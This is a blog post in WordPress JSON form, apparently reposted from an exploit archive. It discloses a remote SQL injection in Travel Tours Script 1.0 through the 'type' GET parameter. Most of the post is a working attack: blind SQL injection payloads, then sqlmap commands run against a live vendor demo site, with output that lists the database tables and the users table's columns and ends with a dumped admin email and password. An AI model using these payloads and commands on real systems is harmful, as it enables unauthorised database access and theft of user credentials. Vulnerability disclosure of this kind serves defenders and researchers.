{"id":27202,"date":"2022-07-18T21:20:03","date_gmt":"2022-07-18T17:20:03","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167756\/tts10-sql.txt"},"modified":"2022-07-23T09:54:26","modified_gmt":"2022-07-23T05:24:26","slug":"travel-tours-script-1-0-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/travel-tours-script-1-0-sql-injection\/","title":{"rendered":"Travel Tours Script 1.0 SQL Injection"},"content":{"rendered":"

\u250c\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510
\n\u2502\u2502 C r a C k E r \u250c\u2518
\n\u250c\u2518 T H E C R A C K O F E T E R N A L M I G H T \u2502\u2502
\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518<\/p>\n

\u250c\u2500\u2500\u2500\u2500 From The Ashes and Dust Rises An Unimaginable crack…. \u2500\u2500\u2500\u2500\u2510
\n\u250c\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510
\n\u250c\u2518 [ Exploits ] \u250c\u2518
\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518
\n: Author : CraCkEr \u2502 \u2502 :
\n\u2502 Website : phpjabbers.com \u2502 \u2502 \u2502
\n\u2502 Vendor : PHPJABBERS \u2502 \u2502 Travel Tours Script \u2502
\n\u2502 Software : Travel Tours Script V1.0 \u2502 \u2502 \u2502
\n\u2502 Vuln Type: Remote SQL Injection \u2502 \u2502 A content management solution for \u2502
\n\u2502 Method : GET \u2502 \u2502 travel agencies and tour operators \u2502
\n\u2502 Critical : High [\u2591\u2591\u2592\u2592\u2593\u2593\u2588\u2588] \u2502 \u2502 \u2502
\n\u2502 Impact : Database Access \u2502 \u2502 \u2502
\n\u2502 \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2502
\n\u2502 B4nks-NET irc.b4nks.tk #unix \u250c\u2518
\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518
\n: :
\n\u2502 Release Notes: \u2502
\n\u2502 \u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550 \u2502
\n\u2502 Typically used for remotely exploitable vulnerabilities that can lead to \u2502
\n\u2502 system compromise. \u2502
\n\u2502 \u2502
\n\u250c\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510
\n\u250c\u2518 Exploit URL’s \u250c\u2518
\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518<\/p>\n

Live Demo Site:<\/p>\n

https:\/\/www.phpjabbers.com\/travel-tours-script\/#sectionDemo<\/p>\n

POC:<\/p>\n

https:\/\/demo.phpjabbers.com\/1657840896_841\/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1′[Injection]\nGET parameter ‘type’ is vulnerable<\/p>\n


\nParameter: type (GET)
\nType: boolean-based blind
\nTitle: AND boolean-based blind – WHERE or HAVING clause
\nPayload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1) AND 8667=8667 AND (4844=4844<\/p>\n

Type: time-based blind
\nTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
\nPayload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1) AND (SELECT 7164 FROM (SELECT(SLEEP(5)))loCg) AND (7206=7206
\n—<\/p>\n

[+] Starting the Attack<\/p>\n

sqlmap.py -u “https:\/\/demo.phpjabbers.com\/1657840896_841\/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1” –current-db –batch –random-agent –no-cast<\/p>\n

the back-end DBMS is MySQL
\nweb server operating system: Linux CentOS 6
\nweb application technology: Apache 2.2.15
\nback-end DBMS: MySQL >= 5.0.12
\n[INFO] fetching current database
\ncurrent database: ‘pjabbers_demo_vpl’<\/p>\n

sqlmap.py -u “https:\/\/demo.phpjabbers.com\/1657840896_841\/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1” -D pjabbers_demo_vpl –tables –batch –random-agent –no-cast<\/p>\n

[INFO] fetching tables for database: ‘pjabbers_demo_vpl’
\n[INFO] fetching number of tables for database ‘pjabbers_demo_vpl’
\n[INFO] resumed: 52<\/p>\n

+——————————————+
\n| vacationpackages_comments |
\n| vacationpackages_countries |
\n| vacationpackages_enquiries |
\n| vacationpackages_features |
\n| vacationpackages_fields |
\n| vacationpackages_listings_availabilities |
\n| vacationpackages_listings_features |
\n| vacationpackages_listings |
\n| vacationpackages_multi_lang |
\n| vacationpackages_notifications |
\n| vacationpackages_options |
\n| vacationpackages_payments |
\n| vacationpackages_periods |
\n| vacationpackages_plugin_country |
\n| vacationpackages_plugin_galleries_set |
\n| vacationpackages_plugin_gallery |
\n| vacationpackages_plugin_locale_languages |
\n| vacationpackages_plugin_locale |
\n| vacationpackages_plugin_log_config |
\n| vacationpackages_plugin_log |
\n| vacationpackages_plugin_one_admin |
\n| vacationpackages_plugin_paypal |
\n| vacationpackages_prices |
\n| vacationpackages_roles |
\n| vacationpackages_types |
\n| vacationpackages_users |
\n| vacationpackages_comments |
\n| vacationpackages_countries |
\n| vacationpackages_enquiries |
\n| vacationpackages_features |
\n| vacationpackages_fields |
\n| vacationpackages_listings |
\n| vacationpackages_listings_availabilities |
\n| vacationpackages_listings_features |
\n| vacationpackages_multi_lang |
\n| vacationpackages_notifications |
\n| vacationpackages_options |
\n| vacationpackages_payments |
\n| vacationpackages_periods |
\n| vacationpackages_plugin_country |
\n| vacationpackages_plugin_galleries_set |
\n| vacationpackages_plugin_gallery |
\n| vacationpackages_plugin_locale |
\n| vacationpackages_plugin_locale_languages |
\n| vacationpackages_plugin_log |
\n| vacationpackages_plugin_log_config |
\n| vacationpackages_plugin_one_admin |
\n| vacationpackages_plugin_paypal |
\n| vacationpackages_prices |
\n| vacationpackages_roles |
\n| vacationpackages_types |
\n| vacationpackages_users |
\n+——————————————+<\/p>\n

sqlmap.py -u “https:\/\/demo.phpjabbers.com\/1657905972_980\/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1” -D pjabbers_demo_vpl -T vacationpackages_users –columns –batch –random-agent –threads 5 –no-cast<\/p>\n

[INFO] fetching columns for table ‘vacationpackages_users’ in database ‘pjabbers_demo_vpl’
\nDatabase: pjabbers_demo_vpl
\nTable: vacationpackages_users
\n[16 columns]\n

+—————-+——————————————————–+
\n| Column | Type |
\n+—————-+——————————————————–+
\n| contact_fax | varchar(255) |
\n| contact_mobile | varchar(255) |
\n| contact_phone | varchar(255) |
\n| contact_title | enum(‘mr’,’mrs’,’miss’,’ms’,’dr’,’prof’,’rev’,’other’) |
\n| contact_url | varchar(255) |
\n| created | datetime |
\n| email | varchar(255) |
\n| id | int(10) unsigned |
\n| ip | varchar(15) |
\n| is_active | enum(‘T’,’F’) |
\n| last_login | datetime |
\n| name | varchar(255) |
\n| password | blob |
\n| phone | varchar(255) |
\n| role_id | int(10) unsigned |
\n| status | enum(‘T’,’F’) |
\n+—————-+——————————————————–+<\/p>\n

sqlmap.py -u “https:\/\/demo.phpjabbers.com\/1657905972_980\/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1” -D pjabbers_demo_vpl -T vacationpackages_users -C email,password –dump –batch –random-agent –threads 5 –no-cast<\/p>\n

[INFO] fetching number of column(s) ’email,password’ entries for table ‘vacationpackages_users’ in database ‘pjabbers_demo_vpl’
\nDatabase: pjabbers_demo_vpl
\nTable: vacationpackages_users
\n[1 entry]\n

+—————–+————————+
\n| email | password |
\n+—————–+————————+
\n|admin@admin.com | P@S13rd |
\n+—————–+————————+<\/p>\n

[-] Done<\/p>\n

\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<\/p>\n

Greets:
\nThe_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL
\nCryptoJob (Twitter) twitter.com\/CryptozJob
\n\u250c\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510
\n\u250c\u2518 \u00a9 CraCkEr 2022 \u250c\u2518
\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518<\/p>\n","protected":false},"excerpt":{"rendered":"

\u250c\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u2502\u2502 C r a C k E r \u250c\u2518 \u250c\u2518 T H E C R A C K O F E T E R N A L M I G H T \u2502\u2502 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518 \u250c\u2500\u2500\u2500\u2500 From The Ashes and Dust Rises An Unimaginable crack…. \u2500\u2500\u2500\u2500\u2510 \u250c\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510 \u250c\u2518 [ Exploits ] \u250c\u2518 \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\u2518 : Author …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-27202","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/27202","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=27202"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/27202\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=27202"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=27202"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=27202"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}